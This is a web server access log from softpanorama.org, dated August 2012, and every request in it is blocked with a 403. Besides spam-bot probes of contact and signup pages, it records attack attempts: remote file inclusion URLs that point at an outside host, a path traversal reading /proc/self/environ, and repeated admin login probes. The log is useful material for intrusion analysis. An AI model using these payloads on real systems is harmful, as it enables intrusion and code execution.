5.9.198.245 - - [28/Aug/2012:16:02:54 -0700] "GET /DNS/security.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/DNS/security.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
85.107.189.12 - - [28/Aug/2012:16:05:27 -0700] "POST /admin/administrators.php/login.php?action=insert HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)"
85.107.189.12 - - [28/Aug/2012:16:05:28 -0700] "POST /admin/login.php?action=process HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)"
178.84.149.128 - - [28/Aug/2012:16:29:31 -0700] "GET /login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
178.84.149.128 - - [28/Aug/2012:16:29:32 -0700] "GET /signup.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
5.39.112.251 - - [28/Aug/2012:16:44:11 -0700] "GET /Tools/dd.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Tools/dd.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
174.106.4.142 - - [28/Aug/2012:16:47:09 -0700] "GET /index.php?page=register HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
5.39.112.251 - - [28/Aug/2012:17:00:41 -0700] "GET /OSS/index.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/OSS/index.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
37.220.26.62 - - [28/Aug/2012:17:12:53 -0700] "HEAD /history/hesilverhand.com/twacks/index.php?PHPSESSID=3114b73036790fa90aff2300bb08ce7e&topic=16451.15 HTTP/1.0" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50"
91.194.251.186 - - [28/Aug/2012:17:13:36 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
174.106.4.142 - - [28/Aug/2012:17:31:59 -0700] "GET /profile.php?mode=register HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 5.1; rv:8.0) Gecko/20100101 Firefox/8.0"
91.194.251.186 - - [28/Aug/2012:17:37:10 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
91.194.251.186 - - [28/Aug/2012:17:40:04 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
91.121.106.113 - - [28/Aug/2012:17:42:35 -0700] "GET /Mail/mta.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Mail/mta.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [28/Aug/2012:17:45:33 -0700] "GET /Mail/spam.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Mail/spam.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
91.194.251.186 - - [28/Aug/2012:17:47:02 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
37.59.173.131 - - [28/Aug/2012:17:48:43 -0700] "GET /Scripting/Phprama/command_line_php.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Scripting/Phprama/command_line_php.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
68.169.35.164 - - [28/Aug/2012:17:53:39 -0700] "GET /Commercial_linuxes/Suse/Security/launchpad_login.php HTTP/1.0" 403 82 "http://www.softpanorama.org/launchpad_login.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; MRA 5.10 (build 5310); .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"
5.39.112.251 - - [28/Aug/2012:17:58:56 -0700] "GET /Scripting/Shellorama/vi_mode.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Scripting/Shellorama/vi_mode.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
46.246.17.192 - - [28/Aug/2012:18:11:02 -0700] "GET /Mail/mta.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Mail/mta.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
157.55.32.80 - - [28/Aug/2012:18:31:31 -0700] "GET /Security/IDS/acid.shtml/hall.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
5.39.112.251 - - [28/Aug/2012:18:35:24 -0700] "GET /OSS/linus_midas_touch.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/OSS/linus_midas_touch.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [28/Aug/2012:18:42:53 -0700] "GET /DNS/dns_servers.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/DNS/dns_servers.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
222.122.46.235 - - [28/Aug/2012:18:43:39 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
46.105.99.187 - - [28/Aug/2012:18:44:24 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
46.105.99.187 - - [28/Aug/2012:18:45:46 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
5.39.112.251 - - [28/Aug/2012:18:48:03 -0700] "GET /SE/humor.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/SE/humor.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
46.105.99.187 - - [28/Aug/2012:18:48:05 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
5.39.112.251 - - [28/Aug/2012:18:56:42 -0700] "GET /People/Stallman/index.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/People/Stallman/index.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
176.223.201.139 - - [28/Aug/2012:19:03:17 -0700] "POST /contact.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
5.39.112.251 - - [28/Aug/2012:19:14:30 -0700] "GET /People/Cox/index.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/People/Cox/index.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
211.210.0.11 - - [28/Aug/2012:19:30:19 -0700] "GET /zboard.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
211.210.0.11 - - [28/Aug/2012:19:30:31 -0700] "GET /zboard.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
211.210.0.11 - - [28/Aug/2012:19:31:52 -0700] "GET /Malware/Malicious_web/zboard.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
211.210.0.11 - - [28/Aug/2012:19:31:53 -0700] "GET /zboard.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
211.210.0.11 - - [28/Aug/2012:19:31:53 -0700] "GET /Malware/zboard.php HTTP/1.1" 403 82 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
5.39.112.251 - - [28/Aug/2012:19:54:58 -0700] "GET /Net/troubleshooting.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Net/troubleshooting.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
108.60.129.21 - - [28/Aug/2012:20:07:16 -0700] "GET /Lang/cpp.shtml%22%20class=%22resultLink/admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
108.60.129.21 - - [28/Aug/2012:20:07:16 -0700] "GET /admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
108.60.129.21 - - [28/Aug/2012:20:07:17 -0700] "GET /Lang/cpp.shtml%22%20class=%22resultLink/admin/categories.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
108.60.129.21 - - [28/Aug/2012:20:07:17 -0700] "GET /Lang/cpp.shtml%22%20class=%22resultLink/admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
108.60.129.21 - - [28/Aug/2012:20:07:17 -0700] "GET /admin/categories.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
108.60.129.21 - - [28/Aug/2012:20:07:17 -0700] "GET /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.175.50.169 - - [28/Aug/2012:20:13:16 -0700] "GET /WWW/Content_management/wiki.shtml/index.php?title=Special:UserLogin&action=submitlogin&type=signup&returnto=Special:UserLogin HTTP/1.1" 403 82 "http://www.softpanorama.org/WWW/Content_management/wiki.shtml/index.php?title=Special:UserLogin&type=signup&returnto=Special:UserLogin&returntoquery=type%3Dsignup" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.175.50.169 - - [28/Aug/2012:20:13:16 -0700] "POST /WWW/Content_management/wiki.shtml/index.php?title=Special:UserLogin&action=submitlogin&type=signup&returnto=Special:UserLogin HTTP/1.1" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
200.98.201.180 - - [28/Aug/2012:20:13:19 -0700] "GET /Lang/cpp.shtml%22%20class=%22resultLink/admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.98.201.180 - - [28/Aug/2012:20:13:20 -0700] "GET /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.98.201.180 - - [28/Aug/2012:20:13:20 -0700] "GET /Lang/cpp.shtml%22%20class=%22resultLink/admin/categories.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.98.201.180 - - [28/Aug/2012:20:13:20 -0700] "GET /admin/categories.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.98.201.180 - - [28/Aug/2012:20:13:21 -0700] "GET /Lang/cpp.shtml%22%20class=%22resultLink/admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
200.98.201.180 - - [28/Aug/2012:20:13:22 -0700] "GET /admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
108.60.129.21 - - [28/Aug/2012:20:28:16 -0700] "GET /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
108.60.129.21 - - [28/Aug/2012:20:29:05 -0700] "GET /admin/banner_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
5.39.112.251 - - [28/Aug/2012:20:36:14 -0700] "GET /Copyright/humor.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Copyright/humor.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
157.55.34.35 - - [28/Aug/2012:22:17:07 -0700] "GET /WWW/Webservers/web_server_security.shtml/nota.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
188.132.239.233 - - [28/Aug/2012:22:22:02 -0700] "GET /extras/curltest.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:22:22:22 -0700] "GET /extras/curltest.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
37.59.173.131 - - [28/Aug/2012:22:49:15 -0700] "GET /Scripting/Phprama/command_line_php.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Scripting/Phprama/command_line_php.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [28/Aug/2012:23:06:01 -0700] "GET /Admin/unix_conf_managment.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Admin/unix_conf_managment.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
27.153.250.187 - - [28/Aug/2012:23:32:57 -0700] "GET /scripting/phprama/ HTTP/1.1" 403 82 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"
5.39.112.251 - - [28/Aug/2012:23:42:09 -0700] "GET /Commercial_linuxes/lpi_certification.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Commercial_linuxes/lpi_certification.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
188.132.239.233 - - [28/Aug/2012:23:43:07 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:43:08 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:43:09 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:43:10 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:43:11 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:43:12 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:49:28 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:49:29 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:49:30 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:49:31 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:49:32 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.132.239.233 - - [28/Aug/2012:23:49:33 -0700] "POST /admin/file_manager.php/login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
5.39.112.251 - - [29/Aug/2012:00:04:22 -0700] "GET /Articles/Linux_vs_Solaris/comparison_of_internal_architecture.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Articles/Linux_vs_Solaris/comparison_of_internal_architecture.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
85.107.189.12 - - [29/Aug/2012:01:12:22 -0700] "POST /admin/administrators.php/login.php?action=insert HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)"
85.107.189.12 - - [29/Aug/2012:01:12:22 -0700] "POST /admin/login.php?action=process HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E)"
5.39.112.251 - - [29/Aug/2012:01:32:07 -0700] "GET /Net/Transport_layer/index.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Net/Transport_layer/index.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
91.121.89.20 - - [29/Aug/2012:02:46:25 -0700] "POST /Lang/cpp.shtml%22%20class=%22resultLink/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [29/Aug/2012:02:46:25 -0700] "POST /Lang/cpp.shtml%22%20class=%22resultLink/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [29/Aug/2012:02:46:26 -0700] "POST /Lang/cpp.shtml%22%20class=%22resultLink/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [29/Aug/2012:02:46:27 -0700] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [29/Aug/2012:02:46:27 -0700] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [29/Aug/2012:02:46:28 -0700] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [29/Aug/2012:02:46:28 -0700] "POST /Lang/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [29/Aug/2012:02:46:29 -0700] "POST /Lang/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.121.89.20 - - [29/Aug/2012:02:46:30 -0700] "POST /Lang/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
112.25.12.38 - - [29/Aug/2012:03:38:32 -0700] "GET /login.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
80.58.29.174 - - [29/Aug/2012:03:38:34 -0700] "GET /signup.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
80.58.29.174 - - [29/Aug/2012:03:38:35 -0700] "GET /signup.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)"
5.39.112.251 - - [29/Aug/2012:03:43:28 -0700] "GET /WWW/www_management_scripts.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/WWW/www_management_scripts.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
37.59.131.9 - - [29/Aug/2012:03:46:16 -0700] "GET /Tools/index.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Tools/index.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
174.127.116.240 - - [29/Aug/2012:03:51:35 -0700] "GET /register.php?do=signup HTTP/1.1" 403 82 "http://www.softpanorama.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)"
5.39.112.251 - - [29/Aug/2012:04:13:19 -0700] "GET /History/index.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/History/index.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:04:16:01 -0700] "GET /history.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/history.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
5.39.112.251 - - [29/Aug/2012:04:32:16 -0700] "GET /Windows/startup_and_shutdown.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/Windows/startup_and_shutdown.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
64.15.147.199 - - [29/Aug/2012:04:54:57 -0700] "GET /Skeptics/Political_skeptic//parse/parser.php?WN_BASEDIR=test?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
64.15.147.199 - - [29/Aug/2012:04:54:58 -0700] "GET /Skeptics/Political_skeptic//parse/parser.php?WN_BASEDIR=http://www.aorta.ca/byroe.jpg?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
64.15.147.199 - - [29/Aug/2012:04:54:59 -0700] "GET /Skeptics/Political_skeptic//parse/parser.php?WN_BASEDIR=?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
64.15.147.199 - - [29/Aug/2012:04:55:01 -0700] "GET //parse/parser.php?WN_BASEDIR=test?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
64.15.147.199 - - [29/Aug/2012:04:55:02 -0700] "GET //parse/parser.php?WN_BASEDIR=http://www.aorta.ca/byroe.jpg?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
64.15.147.199 - - [29/Aug/2012:04:55:03 -0700] "GET //parse/parser.php?WN_BASEDIR=?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
64.15.147.199 - - [29/Aug/2012:04:55:04 -0700] "GET /Skeptics//parse/parser.php?WN_BASEDIR=test?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
64.15.147.199 - - [29/Aug/2012:04:55:05 -0700] "GET /Skeptics//parse/parser.php?WN_BASEDIR=http://www.aorta.ca/byroe.jpg?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
64.15.147.199 - - [29/Aug/2012:04:55:07 -0700] "GET /Skeptics//parse/parser.php?WN_BASEDIR=?? HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
5.39.112.251 - - [29/Aug/2012:06:05:31 -0700] "GET /OSS/open_source.shtmlindex.php HTTP/1.0" 403 82 "http://www.softpanorama.org/OSS/open_source.shtmlindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
219.137.181.125 - - [29/Aug/2012:06:08:47 -0700] "GET /submit.php HTTP/1.1" 403 82 "http://www.softpanorama.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
219.137.181.125 - - [29/Aug/2012:06:08:49 -0700] "GET /submit.php HTTP/1.1" 403 82 "http://www.softpanorama.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
205.189.73.122 - - [29/Aug/2012:06:16:55 -0700] "GET /register.php HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.78 Safari/535.11"
95.173.185.22 - - [29/Aug/2012:06:36:09 -0700] "GET /WWW/web_logs_analysis.shtml//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.173.185.22 - - [29/Aug/2012:06:36:09 -0700] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 403 82 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
